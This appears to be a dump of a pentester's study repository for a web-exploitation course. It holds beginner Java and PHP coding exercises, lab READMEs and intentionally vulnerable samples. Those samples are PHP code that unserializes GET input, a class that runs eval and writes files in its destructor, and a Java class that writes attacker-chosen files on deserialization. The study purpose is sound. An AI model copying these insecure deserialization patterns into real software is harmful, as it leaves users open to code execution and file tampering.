22 | System.out.printf("%d\n", getAbsSum(new int[]{2, -1, 4, 8, 10}));
23 | }
24 | }
25 |
--------------------------------------------------------------------------------
/Edabit/php/five.php:
--------------------------------------------------------------------------------
1 |
22 |
--------------------------------------------------------------------------------
/Edabit/java/nine.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes an array and a string as
4 | arguments and return the index of the string.
5 |
6 | */
7 |
8 | public class Program
9 | {
10 | public static int findIndex(String[] arr, String str)
11 | {
12 | int i;
13 | for (i = 0; i < arr.length; i++)
14 | if (arr[i] == str)
15 | break;
16 | return i;
17 | }
18 |
19 | public static void main(String[] args)
20 | {
21 | System.out.printf("%d\n",
22 | findIndex(new String[]{"hi", "edabit", "fgh", "abc"}, "fgh")
23 | );
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/index2.php:
--------------------------------------------------------------------------------
1 | filename);
10 | }
11 | }
12 |
13 | class User
14 | {
15 | public $age = 0;
16 | public $name = '';
17 |
18 | public function __to_String()
19 | {
20 | return "User ".$this->name." is ".$this->age." years old.";
21 | }
22 | }
23 |
24 | $obj = unserialize($_GET['usr']);
25 |
26 | echo $obj; // will call __toString method of unserialized object
27 |
28 | ?>
29 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/XMLHttpRequests/task16-csrf_grab.js:
--------------------------------------------------------------------------------
1 |
13 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Parsing/task18-html_parsing.js:
--------------------------------------------------------------------------------
1 |
19 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Modifying-HTML/task3-redirect_input.js:
--------------------------------------------------------------------------------
1 |
19 |
--------------------------------------------------------------------------------
/Simple Object Oriented Language Examples/class-example.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | '''
4 |
5 | Author: wetw0rk
6 |
7 | Very simple example of object oriented programming in Python
8 |
9 | '''
10 |
11 | class Picture():
12 |
13 | def __init__(self, id, title, img):
14 | self.id = id
15 | self.title = title
16 | self.img = img
17 |
18 | def display_values(self):
19 | print("id:%s, title:%s, img:%s" % (
20 | self.id, self.title, self.img
21 | )
22 | )
23 |
24 | # initialize and call
25 | example = Picture("1", "wetw0rk", "file.png")
26 | example.display_values()
27 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/log.php:
--------------------------------------------------------------------------------
1 | filename = '';
10 | $this->data = '';
11 | }
12 |
13 | public function PrintLog()
14 | {
15 | $pre = "[LOG]";
16 | $now = date('Y-m-d H:i:s');
17 |
18 | $str = '$pre - $now - $this->data';
19 | eval("\$str = \"$str\";");
20 | echo $str;
21 | }
22 |
23 | public function __destruct()
24 | {
25 | file_put_contents($this->filename, $this->data, FILE_APPEND);
26 | }
27 | }
28 | ?>
29 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/XMLHttpRequests/task13_xml_post.js:
--------------------------------------------------------------------------------
1 |
17 |
--------------------------------------------------------------------------------
/Simple Object Oriented Language Examples/class-example.js:
--------------------------------------------------------------------------------
1 |
33 |
--------------------------------------------------------------------------------
/Edabit/php/nineteen.php:
--------------------------------------------------------------------------------
1 |
26 |
--------------------------------------------------------------------------------
/Edabit/php/ten.php:
--------------------------------------------------------------------------------
1 |
23 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/XMLHttpRequests/task17-csrf_token_jack.js:
--------------------------------------------------------------------------------
1 |
19 |
--------------------------------------------------------------------------------
/Edabit/java/eleven.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | There is a single operator in Java capable of providing the remainder
4 | of a division operation. Two numbers are passed as parameters. The
5 | first provider divided by the second parameter will have a remainder,
6 | possiby zero. Return that value.
7 |
8 | */
9 |
10 |
11 | public class Program
12 | {
13 | public static int myMethod(int a, int b)
14 | {
15 | return a % b;
16 | }
17 |
18 | public static void main(String[] args)
19 | {
20 | System.out.printf("%d\n", myMethod(1, 3));
21 | System.out.printf("%d\n", myMethod(-9, 45));
22 | System.out.printf("%d\n", myMethod(5, 5));
23 | }
24 | }
25 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Modifying-HTML/task4-new_field.js:
--------------------------------------------------------------------------------
1 |
17 |
--------------------------------------------------------------------------------
/Edabit/java/seven.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an integer as its only argument
4 | and returns true if it's less than or equal to zero,
5 | otherwise return false.
6 |
7 | */
8 |
9 | public class Program
10 | {
11 | public static boolean lessThanOrEqualToZero(int num)
12 | {
13 | return (num <= 0) ? true : false;
14 | }
15 |
16 | public static void main(String[] args)
17 | {
18 | System.out.printf("%b\n", lessThanOrEqualToZero(5));
19 | System.out.printf("%b\n", lessThanOrEqualToZero(0));
20 | System.out.printf("%b\n", lessThanOrEqualToZero(-2));
21 | System.out.printf("%b\n", lessThanOrEqualToZero(1));
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/Edabit/java/thirty-four.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes an array of numbers and returns the mean value.
4 |
5 | */
6 |
7 | import java.util.*;
8 |
9 | public class Program
10 | {
11 | public static double mean(int[] nums)
12 | {
13 | double avg = 0;
14 |
15 | for (int i = 0; i < nums.length; i++)
16 | avg += nums[i];
17 |
18 | return Math.round((avg / nums.length) * 100.0 ) / 100.0;
19 | }
20 |
21 | public static void main(String[] args)
22 | {
23 | System.out.printf("%s\n", mean(new int[]{1, 0, 4, 5, 2, 4, 1, 2, 3, 3, 3}));
24 | System.out.printf("%s\n", mean(new int[]{1, 0, 4, 5, 2, 4, 1, 2, 3, 3, 3}));
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/Edabit/java/eighteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an integer as an argument. Add up all the numbers
4 | from 1 to the number you passed to the function. For example, if the input is
5 | 4 then your function should return 10 because 1 + 2 + 3 + 4 = 10.
6 |
7 | */
8 |
9 | public class Program
10 | {
11 | public static int addUp(int num)
12 | {
13 | int f = num;
14 | for (int i = 0; i < num; i++)
15 | f += i;
16 | return f;
17 | }
18 |
19 | public static void main(String[] args)
20 | {
21 | System.out.printf("%d\n", addUp(4));
22 | System.out.printf("%d\n", addUp(13));
23 | System.out.printf("%d\n", addUp(600));
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/Simple Object Oriented Language Examples/class-example.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Author: wetw0rk
4 |
5 | Very simple example of object oriented programming in Java
6 |
7 | */
8 |
9 | public class Picture
10 | {
11 | String id, img, title;
12 |
13 | public Picture(String id, String title, String img)
14 | {
15 | this.id = id;
16 | this.title = title;
17 | this.img = img;
18 | }
19 | void display_values()
20 | {
21 | System.out.printf("id:%s, title:%s, img:%s\n", this.id, this.title, this.img);
22 | }
23 | public static void main(String[] args)
24 | {
25 | Picture example = new Picture("1", "wetw0rk", "file.png");
26 | example.display_values();
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/Simple Object Oriented Language Examples/class-example.php:
--------------------------------------------------------------------------------
1 | id = $id;
16 | $this->title = $title;
17 | $this->img = $img;
18 | }
19 | function display_values()
20 | {
21 | echo sprintf("id:%s, ", $this->id);
22 | echo sprintf("title:%s, ", $this->title);
23 | echo sprintf("img:%s\n", $this->img);
24 | }
25 | }
26 |
27 | // initialize and call
28 | $example = new Picture("1", "wetw0rk", "file.png");
29 | $example->display_values();
30 |
31 | ?>
32 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-five.php:
--------------------------------------------------------------------------------
1 | = 1)
24 | {
25 | $res = str_ireplace($sausage[$i], "Wurst", $res);
26 | }
27 | }
28 | return $res;
29 | }
30 |
31 | echo wurstIsBetter("sausage fests are like Sausage fests")."\n";
32 |
33 |
34 | ?>
35 |
--------------------------------------------------------------------------------
/Edabit/README.md:
--------------------------------------------------------------------------------
1 | # Edabit
2 |
3 | The AWAE syllabus appears to include many real world CVE's meaning we will likely be doing source code review, or chaining vulnerabilities in order to obtain code execution. Depending on the bug we may need to deploy custom payloads etc, so I decided to spend a week per language specifically Java, JavaScript, and PHP. Since I know Python I decided to skip it, however if you have little to no experience in Python I recommend spending a week on it as well.
4 |
5 | It's important you are able to do the following in each language:
6 | - Create a function
7 | - Call a function
8 | - Create a class
9 | - Call a class
10 | - Debug issues
11 |
12 | ## Links
13 |
14 | https://edabit.com/
15 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-six.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | You will be implementing a basic case of the map-reduce pattern in programming.
4 | Given a vector stored as an array of numbers, find the magnitude of the vector.
5 | Use the standard distance formula for n-dimensional Cartesian coordinates.
6 |
7 | */
8 |
9 | import java.util.*;
10 |
11 | public class Program
12 | {
13 | public static double magnitude(int[] nums)
14 | {
15 | double mag = 0;
16 |
17 | for (int i = 0; i < nums.length; i++)
18 | mag += Math.pow(nums[i],2);
19 |
20 | return Math.sqrt(mag);
21 | }
22 |
23 | public static void main(String[] args)
24 | {
25 | System.out.printf("%f\n", magnitude(new int[]{3, 4}));
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-four.php:
--------------------------------------------------------------------------------
1 | = 1 && substr_count($arr[1], ".com") == 1) { // len([0] >= 1 && ".com" in [1]
7 | $narr = explode('.', $arr[1]); // split aka n[0]=x, n[1]=com
8 | if (strlen($narr[0]) >= 1) // len(n[0]) >= 1
9 | return true; // return true
10 | }
11 | }
12 | return false;
13 | }
14 |
15 | echo "r: ";
16 | echo var_export(validateEmail("pen.tester@gmail.com"))."\n";
17 |
18 | ?>
19 |
--------------------------------------------------------------------------------
/From SQL Injection to Shell/README.md:
--------------------------------------------------------------------------------
1 | # From SQL Injection to Shell (NO SQLMAP ALLOWED)
2 |
3 | This exercise explains how you can, from a SQL injection, gain access to the administration console, then in the administration console, how you can run commands on the system.
4 |
5 | ## Personal Note
6 |
7 | It's important you fully understand where in the source code the vulnerability resides. After exploitation or before exploitation identify what function within the class is vulnerable, and why is reacts that way. How would you have gotten a shell with more privledges without the admin console?
8 |
9 | ## Links
10 | - https://pentesterlab.com/exercises/from_sqli_to_shell/course
11 | - https://pentesterlab.com/exercises/from_sqli_to_shell/iso
12 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/README.md:
--------------------------------------------------------------------------------
1 | # /dev/random: Pipe
2 |
3 | This challenge involves the exploitation of a PHP Object Injection vulnerability (which is why it's on the list). Pretty straight forward exploitation to get the initial shell, but priv escalation is a bit strange and In my opinion was harder.
4 |
5 | ## Personal Note
6 |
7 | Weaponize the exploit from scratch! You may encounter something like this during the course, and you need to be ready to craft an exploit. I wrote the exploit in PHP, however it can be written in any language. Feel free to look over my exploit if you get stuck although it should be straight forward. Good luck!
8 |
9 | ## Links
10 |
11 | - https://www.vulnhub.com/entry/devrandom-pipe,124/
12 | - https://download.vulnhub.com/devrandom/pipe.ova
13 |
--------------------------------------------------------------------------------
/Edabit/java/five.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of integers. Return the largest integer in the array.
4 |
5 | we could have also done:
6 |
7 | ```
8 | import static java.util.Arrays.stream;
9 |
10 | public static int findLargestNum(int[] nums) {
11 | return stream(nums).max().getAsInt();
12 | }
13 | ```
14 |
15 | */
16 |
17 | public class Program
18 | {
19 | public static int findLargestNum(int[] nums)
20 | {
21 | int largest = nums[0];
22 | for (int i = 0; i < nums.length; i++)
23 | if (nums[i] > largest)
24 | largest = nums[i];
25 | return largest;
26 | }
27 |
28 | public static void main(String[] args)
29 | {
30 | System.out.printf("%s\n", findLargestNum(new int[]{4,5,1,3}));
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/deser_example.java:
--------------------------------------------------------------------------------
1 | // run using: java
2 |
3 | import java.io.*;
4 |
5 | public class Userial
6 | {
7 | public static void main(String[] args)
8 | {
9 | String name;
10 | String filename = "file.bin";
11 |
12 | try
13 | {
14 | FileInputStream file = new FileInputStream(filename);
15 | ObjectInputStream out = new ObjectInputStream(file);
16 |
17 | // deserialization of the object (String)
18 | // will be written to STDOUT
19 | name = (String) out.readObject();
20 | System.out.println(name);
21 |
22 | out.close();
23 | file.close();
24 | }
25 | catch (Exception e)
26 | {
27 | System.out.printf("Exception: %s\n", e.toString());
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/Edabit/java/twelve.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of 10 integers (between 0 and 9)
4 | and returns a string of those numbers formatted as a phone number
5 | (e.g. (555) 555-5555).
6 |
7 | */
8 |
9 | public class Program
10 | {
11 | public static String formatPhoneNumber(int[] nums)
12 | {
13 | String final_str = "(";
14 | for (int i = 0; i < nums.length; i++)
15 | {
16 | if (i == 3)
17 | final_str += ") ";
18 | if (i == 6)
19 | final_str += '-';
20 | final_str += Integer.toString(nums[i]);
21 | }
22 | return final_str;
23 | }
24 |
25 | public static void main(String[] args)
26 | {
27 | System.out.printf("%s\n",
28 | formatPhoneNumber(new int[]{1, 2, 3, 4, 5, 6, 7, 8, 9, 0})
29 | );
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/ser_example.java:
--------------------------------------------------------------------------------
1 | // run using: java
2 |
3 | import java.io.*;
4 |
5 | public class Serial
6 | {
7 | public static void main(String[] args)
8 | {
9 | String name = "wetw0rk";
10 | String filename = "file.bin";
11 | try
12 | {
13 | FileOutputStream file = new FileOutputStream(filename);
14 | ObjectOutputStream out = new ObjectOutputStream(file);
15 |
16 | // serialization of "name" (String) object
17 | // will be written to "file.bin"
18 |
19 | out.writeObject(name); // write
20 | out.close(); // close stream
21 | file.close(); // close fd stream
22 | }
23 | catch (Exception e)
24 | {
25 | System.out.printf("Exception: %s\n", e.toString());
26 | }
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/Edabit/java/twenty.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of integers and returns a new array,
4 | sorted in ascending order (smallest to biggest).
5 |
6 | - Sort integer array in ascending order.
7 | - If functions argument is an empty array, return an empty array.
8 | - Return new array of sorted integers.
9 |
10 | */
11 |
12 | import java.util.Arrays;
13 |
14 | public class Program
15 | {
16 | public static int[] sortNumsAscending(int[] nums)
17 | {
18 | Arrays.sort(nums);
19 | return nums;
20 | }
21 |
22 | public static void main(String[] args)
23 | {
24 | int[] arr1 = new int[]{1, 2, 10, 50, 5};
25 | int[] arr2 = new int[]{};
26 |
27 | System.out.println(Arrays.toString(sortNumsAscending(arr1)));
28 | System.out.println(Arrays.toString(sortNumsAscending(arr2)));
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-three.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that alternates the case of the letters in a string.
4 |
5 | */
6 |
7 | import java.util.Arrays;
8 |
9 | public class Program
10 | {
11 | public static String alternatingCaps(String s)
12 | {
13 | char[] arr = s.toCharArray();
14 | String ret = "";
15 |
16 | for (int i = 0; i < arr.length; i++)
17 | if (i % 2 == 0)
18 | ret += Character.toUpperCase(arr[i]);
19 | else
20 | ret += Character.toLowerCase(arr[i]);
21 |
22 | return ret;
23 | }
24 |
25 | public static void main(String[] args)
26 | {
27 | System.out.printf("%s\n", alternatingCaps("Hello"));
28 | System.out.printf("%s\n", alternatingCaps("HeY, hOw aRe yOu?"));
29 | System.out.printf("%s\n", alternatingCaps("OMG!!! This website is awesome!!"));
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-seven.php:
--------------------------------------------------------------------------------
1 |
34 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-seven.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of strings. Return all words in the
4 | array that are exactly four letters.
5 |
6 | */
7 |
8 | import java.util.*;
9 |
10 | public class Program
11 | {
12 | public static String[] isFourLetters (String[] s)
13 | {
14 | int ct = 0;
15 | int j = 0;
16 |
17 | for (int i = 0; i < s.length; i++)
18 | if (s[i].length() == 4)
19 | ct++;
20 | String[] arr = new String[ct];
21 |
22 | for (int i = 0; i < s.length; i++)
23 | if (s[i].length() == 4)
24 | arr[j++] = s[i];
25 | return arr;
26 | }
27 |
28 | public static void main(String[] args)
29 | {
30 | String[] a = {"Ryan", "Kieran", "Jason", "Matt"};
31 |
32 | System.out.printf("%s\n",
33 | Arrays.toString(isFourLetters(a))
34 | );
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Parsing/task20-multi_level_json.js:
--------------------------------------------------------------------------------
1 |
26 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-five.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes a string and returns the middle character(s).
4 | If the word's length is odd, return the middle character. If the word's
5 | length is even, return the middle two characters.
6 |
7 | */
8 |
9 | import java.util.*;
10 |
11 | public class Program
12 | {
13 | public static String getMiddle(String word)
14 | {
15 | char[] arr = word.toCharArray();
16 | int mid = arr.length/2;
17 |
18 | if (arr.length % 2 == 0)
19 | return String.format("%s%s", arr[mid-1], arr[mid]);
20 | return String.format("%s", arr[mid]);
21 | }
22 |
23 | public static void main(String[] args)
24 | {
25 | System.out.printf("%s\n", getMiddle("test"));
26 | System.out.printf("%s\n", getMiddle("testing"));
27 | System.out.printf("%s\n", getMiddle("middle"));
28 | System.out.printf("%s\n", getMiddle("A"));
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/class-magic-examples.php:
--------------------------------------------------------------------------------
1 | variable."\n";
10 | }
11 | public function __construct() // constructor
12 | {
13 | echo "__construct\n";
14 | }
15 | public function __destruct() // destructor
16 | {
17 | echo "__destruct\n";
18 | }
19 | public function __toString()
20 | {
21 | return "__toString\n";
22 | }
23 | }
24 |
25 | $object = new TestClass(); // create an object, this will
26 | // call __construct
27 |
28 | $object->PrintVariable(); // call the method, this will
29 | // print "This is a string"
30 |
31 | echo $object; // object will act as a string
32 | // and will call __toString
33 |
34 | // end of PHP script, call __destruct
35 |
36 | ?>
37 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/README.md:
--------------------------------------------------------------------------------
1 | # Practicing Java Deserialization Exploits
2 |
3 | For this tutorial we will attempt the exploitation of a deserialization bug. It's pretty striaght forward and also dives into the functionality of the payload. I went ahead and for the moment opted out of creating the payload to focus on other exploitation methods although I will be returning to the other links and learning payloads particularly the blind based payloads.
4 |
5 | ## Links
6 |
7 | - https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/
8 | - https://github.com/NickstaDB/DeserLab
9 | - https://github.com/NickstaDB/SerializationDumper
10 | - https://github.com/frohoff/jdeserialize/tree/master/jdeserialize
11 | - https://github.com/frohoff/ysoserial
12 |
13 | ## Other Links
14 |
15 | - https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
16 | - http://gursevkalra.blogspot.com/2016/01/ysoserial-commonscollections1-exploit.html
17 |
--------------------------------------------------------------------------------
/Edabit/java/seventeen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes a string and returns the
4 | number (count) of vowels contained within it.
5 |
6 | */
7 |
8 | public class Program
9 | {
10 | // matchesCount: count occurences of char c in String str1
11 | public static int matchesCount (String str1, char c)
12 | {
13 | int count = 0;
14 | for (int i = 0; i < str1.length(); i++)
15 | if (str1.toLowerCase().charAt(i) == c)
16 | count++;
17 | return count;
18 | }
19 |
20 | public static int getCount(String str)
21 | {
22 | char vowels[] = {'a', 'e', 'i', 'o', 'u'};
23 | int finalc = 0;
24 |
25 | for (int i = 0; i < vowels.length; i++)
26 | finalc += matchesCount(str, vowels[i]);
27 |
28 | return finalc;
29 | }
30 |
31 | public static void main(String[] args)
32 | {
33 | System.out.printf("%d\n", getCount("Celebration"));
34 | System.out.printf("%d\n", getCount("Palm"));
35 | System.out.printf("%d\n", getCount("Prediction"));
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/Edabit/java/nineteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of integers and returns an array where
4 | each integer is the sum of itself + all previous numbers in the array.
5 |
6 | */
7 |
8 | import java.util.Arrays;
9 |
10 | public class Program
11 | {
12 | public static int[] cumulativeSum(int[] nums)
13 | {
14 | int[] arr = new int[nums.length];
15 | int j = 0;
16 |
17 | for (int i = 0; i < (nums.length); i++)
18 | {
19 | arr[i] = nums[i];
20 | while (j != i)
21 | arr[i] += nums[j++];
22 | j = 0;
23 | }
24 |
25 | return arr;
26 | }
27 |
28 | public static void main(String[] args)
29 | {
30 | int[] arr1 = new int[]{1, 2, 3};
31 | int[] arr2 = new int[]{1, -2, 3};
32 | int[] arr3 = new int[]{3, 3, -2, 408, 3, 3};
33 |
34 | System.out.println(Arrays.toString(cumulativeSum(arr1)));
35 | System.out.println(Arrays.toString(cumulativeSum(arr2)));
36 | System.out.println(Arrays.toString(cumulativeSum(arr3)));
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/XSS and MySQL/README.md:
--------------------------------------------------------------------------------
1 | # XSS and MySQL (NO SQLMAP ALLOWED)
2 |
3 | This exercise details the exploitation of an XSS vulnerability in a PHP based application and how an attacker can leverage it to gain access to administrative pages; from there leveraging a SQL injection vulnerability to gain full code execution.
4 |
5 | ## Personal Note
6 |
7 | It's important you understand how this attack works and the importance of weaponization, in a real scenarion many companies may be running this application and you want to have an exploit you can just launch. In the AWAE we will likely be chaining bugs to get Pre-auth RCE this is a perfect example to practice this skill. I went ahead and used JavaScript, but the exploit can be automated further using python to POST the comment. Feel free to use my POC however I reccomend you don't cheat and develop it on your own. Best of luck 😄!
8 |
9 | ## Links
10 |
11 | - https://pentesterlab.com/exercises/xss_and_mysql_file/course
12 | - https://pentesterlab.com/exercises/xss_and_mysql_file/iso
13 |
--------------------------------------------------------------------------------
/Edabit/java/thirteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes a string, checks if it has the same number
4 | of 'x's and 'o's and returns either true or false.
5 |
6 | */
7 |
8 | public class Program
9 | {
10 | // matchesCount: count occurences of char c in String str1
11 | public static int matchesCount (String str1, char c)
12 | {
13 | int count = 0;
14 |
15 | for (int i = 0; i < str1.length(); i++)
16 | if (str1.toLowerCase().charAt(i) == c)
17 | count++;
18 |
19 | return count;
20 | }
21 |
22 | public static boolean getXO (String str)
23 | {
24 | return (matchesCount(str, 'x') == matchesCount(str, 'o'));
25 | }
26 |
27 | public static void main(String[] args)
28 | {
29 | System.out.printf("ooxx = %b\n", getXO("ooxx"));
30 | System.out.printf("xooxx = %b\n", getXO("xooxx"));
31 | System.out.printf("ooxXm = %b\n", getXO("ooxXm"));
32 | System.out.printf("zpzpzpp = %b\n", getXO("zpzpzpp"));
33 | System.out.printf("zzoo = %b\n", getXO("zzoo"));
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Parsing/task21-multi_level_xml.js:
--------------------------------------------------------------------------------
1 |
23 |
--------------------------------------------------------------------------------
/Edabit/java/thirty-two.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of names and returns
4 | an array with the first letter capitalized.
5 |
6 | */
7 |
8 | import java.util.*;
9 |
10 | public class Program
11 | {
12 | public static String[] capMe(String[] s)
13 | {
14 | String[] nstr_arr = new String[s.length];
15 |
16 | for (int i = 0; i < s.length; i++)
17 | {
18 | char[] arr = s[i].toCharArray();
19 | for (int j = 0; j < arr.length; j++) {
20 | arr[0] = Character.toUpperCase(arr[0]);
21 | arr[j] = Character.toLowerCase(arr[j]);
22 | }
23 | nstr_arr[i] = new String(arr);
24 | }
25 |
26 | return nstr_arr;
27 | }
28 |
29 | public static void main(String[] args)
30 | {
31 | System.out.println(
32 | Arrays.toString(
33 | capMe(new String[]{"mavis", "senaida", "letty"})
34 | )
35 | );
36 | System.out.println(
37 | Arrays.toString(
38 | capMe(new String[]{"samuel", "MABELLE", "letitia", "meridith"})
39 | )
40 | );
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/ser-magic-funcs.php:
--------------------------------------------------------------------------------
1 | variable."\n";
10 | }
11 | public function __construct() {
12 | echo "__construct\n";
13 | }
14 | public function __destruct() {
15 | echo "__destruct\n";
16 | }
17 | public function __wakeup() {
18 | echo "__wakeup\n";
19 | }
20 | public function __sleep() {
21 | echo "__sleep\n";
22 | return ['variable', 'variable2'];
23 | }
24 | }
25 | $obj = new Test(); // 1. Create an object; will call __construct
26 | $ser = serialize($obj); // 2. serialize() object; will call __sleep
27 |
28 | // print serialized string
29 | echo "Serialize Object: ".$ser."\n";
30 |
31 | $obj2 = unserialize($ser); // 3. unserialize() object string, will call __wakeup
32 | $obj2->PrintVariable(); // 4. call PrintVariable, will echo BUZZ
33 | // 5. PHP script end; call __destruct for both objects
34 |
35 | ?>
36 |
--------------------------------------------------------------------------------
/Edabit/java/thirty-one.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Usually when you sign up for an account to buy something, your credit card number, phone number or answer to a secret question is partially obscured in some way. Since someone could look over your shoulder, you don't want that shown on your screen. Hence, the website masks these strings.
4 |
5 | Your task is to create a method that takes a string, transforms all but the last four characters into "#" and returns the new masked string.
6 |
7 | */
8 |
9 | import java.util.*;
10 |
11 | public class Program
12 | {
13 | public static String maskify(String s)
14 | {
15 | int lc = 0;
16 | String nstr = "";
17 |
18 | if (s.length() > 4)
19 | lc += (s.length() - 4);
20 | else
21 | return s;
22 |
23 | char[] arr = s.toCharArray();
24 | for (int i = 0; i < lc; i++)
25 | arr[i] = '#';
26 | nstr += new String(arr);
27 |
28 |
29 | return nstr;
30 | }
31 |
32 | public static void main(String[] args)
33 | {
34 | System.out.printf("%s\n", maskify("123456"));
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example/src/LogFile.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | // Vulnerable Class
4 | class LogFile implements Serializable
5 | {
6 | public String filename;
7 | public String filecontent;
8 |
9 | // function called during deserialization
10 | private void readObject(ObjectInputStream in)
11 | {
12 | System.out.println("readObject from LogFile");
13 |
14 | try
15 | {
16 | // deserialize data
17 | in.defaultReadObject();
18 | System.out.printf("File name: %s, File content: %s\n",
19 | filename, filecontent
20 | );
21 | // do something useful with the data and restore
22 | // LogFile, write file content to filename
23 | FileWriter file = new FileWriter(filename);
24 | BufferedWriter out = new BufferedWriter(file);
25 |
26 | System.out.println("Restoring log data to a file...");
27 | out.write(filecontent);
28 |
29 | out.close();
30 | file.close();
31 | }
32 | catch (Exception e)
33 | {
34 | System.out.printf("Exception: %s\n", e.toString());
35 | }
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example2/src/LogFile.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | // Vulnerable Class
4 | class LogFile implements Serializable
5 | {
6 | public String filename;
7 | public String filecontent;
8 |
9 | // function called during deserialization
10 | private void readObject(ObjectInputStream in)
11 | {
12 | System.out.println("readObject from LogFile");
13 |
14 | try
15 | {
16 | // deserialize data
17 | in.defaultReadObject();
18 | System.out.printf("File name: %s, File content: %s\n",
19 | filename, filecontent
20 | );
21 | // do something useful with the data and restore
22 | // LogFile, write file content to filename
23 | FileWriter file = new FileWriter(filename);
24 | BufferedWriter out = new BufferedWriter(file);
25 |
26 | System.out.println("Restoring log data to a file...");
27 | out.write(filecontent);
28 |
29 | out.close();
30 | file.close();
31 | }
32 | catch (Exception e)
33 | {
34 | System.out.printf("Exception: %s\n", e.toString());
35 | }
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-four.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a Map and return
4 | the values as a separate array.
5 |
6 | We could have also done the following...
7 |
8 | ```
9 | return dict.values().toArray(new String[0]);
10 | ```
11 |
12 | */
13 |
14 | import java.util.*;
15 |
16 | public class Program
17 | {
18 | public static String[] getValues(Map dict)
19 | {
20 | Set set = dict.entrySet(); // Get a set of entries
21 | Iterator i = set.iterator(); // Get an iterator
22 | String[] final_arr = new String[dict.size()];
23 |
24 | int j = 0; // write key values 2 list
25 | while(i.hasNext())
26 | {
27 | Map.Entry e = (Map.Entry)i.next();
28 | final_arr[j++] = e.getValue().toString();
29 | }
30 | return final_arr;
31 | }
32 |
33 | public static void main(String[] args)
34 | {
35 | Map map = new HashMap();
36 | map.put("a", "1");
37 | map.put("b", "2");
38 | map.put("c", "3");
39 |
40 | System.out.printf("%s\n",
41 | Arrays.toString(getValues(map))
42 | );
43 | }
44 | }
45 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/decipher.txt:
--------------------------------------------------------------------------------
1 | # tshark -r vuln_traffic.pcapng -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=,
2 | 47844,aced0005,54 # Client sends STREAM_MAGIC and STREAM_VERSION for serialization
3 | 54,aced0005,47844 # Server acknowledges the use of STREAM_MAGIC & STREAM_VERSION
4 | 54,7704,47844 # Server tells client to prepare for a TC_BLOCKDATA of 0x04 bytes
5 | 54,f000baaa,47844 # Server sends 4 byte hello
6 | 47844,7704,54 # Client tells server to prepare for a TC_BLOCKDATA of 0x04 bytes
7 | 47844,f000baaa,54 # Client sends 4 byte hello
8 | 54,7702,47844 # Server tells client to prepare for a TC_BLOCKDATA of 0x02 bytes
9 | 54,0101,47844 # Server sends client 2 byte version number
10 | 47844,7702,54 # Client tells server to prepare for a TC_BLOCKDATA of 0x02 bytes
11 | 47844,0101,54 # Client sends server 2 byte version number
